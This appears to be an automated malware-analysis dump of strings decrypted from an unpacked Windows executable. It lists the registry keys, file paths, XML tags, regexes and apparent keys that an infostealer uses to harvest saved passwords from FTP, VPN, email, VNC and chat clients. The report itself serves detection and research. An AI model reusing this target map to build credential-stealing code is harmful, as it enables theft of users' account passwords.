Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \passwordstorerc
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Flock Browser
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Flock\Browser\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: signons3.txt
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: DynDns
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: username=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: password=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: t6KzXhCh
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: global
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: accounts
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: account.
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: username
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: account.
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: name
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Psi\profiles
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Psi+\profiles
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: OpenVPN
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: username
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: auth-data
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: entropy
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: USERPROFILE
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: remote
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: remote
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: NordVPN
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: NordVPN
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: NordVpn.exe*
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: user.config
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: NordVPN
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: %ProgramW6432%
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Private Internet Access\data
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \account.json
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: FileZilla
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Server>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Host>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Host>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </Host>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Port>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </Port>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <User>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <User>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </User>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </Pass>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Pass>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </Pass>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: CoreFTP
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: User
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Host
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Port
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: WinSCP
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: HostName
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UserName
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PublicKeyFile
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PortNumber
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: WinSCP
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ABCDEF
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Flash FXP
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: port
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: user
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pass
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: quick.dat
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Sites.dat
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: FTP Navigator
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: No Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: User
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SmartFTP
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: WS_FTP
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: appdata
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: HOST
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PWD=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PWD=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: FtpCommander
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SystemDrive
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;Password=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;User=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;Server=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;Port=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;Port=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;Password=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;User=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ;Anonymous=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: FTPGetter
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server_ip>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server_ip>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </server_ip>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server_port>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </server_port>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </server_user_name>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </server_user_password>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: FTPGetter
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: The Bat!
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: appdata
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \The Bat!
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Becky!
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: DataDir
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Folder.lst
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Mailbox.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Account
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PassWd
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Account
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SMTPServer
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Account
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: MailAddress
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Becky!
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Outlook
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Email
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IMAP Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: POP3 Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: HTTP Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SMTP Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Email
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Email
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Email
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IMAP Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: POP3 Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: HTTP Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SMTP Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Mail App
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Email
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SchemaId
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pResourceElement
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pPackageSid
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: syncpassword
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: mailoutgoing
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: FoxMail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Executable
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: FoxmailPath
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Storage\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Storage\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Account.stg
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Account.stg
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: POP3Host
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SMTPHost
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IncomingServer
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Account
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: MailAddress
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: POP3Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Opera Mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: opera:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PocoMail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: appdata
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Email
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: POPPass
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SMTPPass
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SMTP
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: eM Client
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: eM Client
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Accounts
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: "Username":"
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: "Secret":"
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: "ProviderName":"
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Mailbird
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SenderIdentities
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Accounts
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Server_Host
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Accounts
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Email
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Username
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: EncryptedPassword
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Mailbird
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: TightVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: TightVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PasswordViewOnly
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ControlPassword
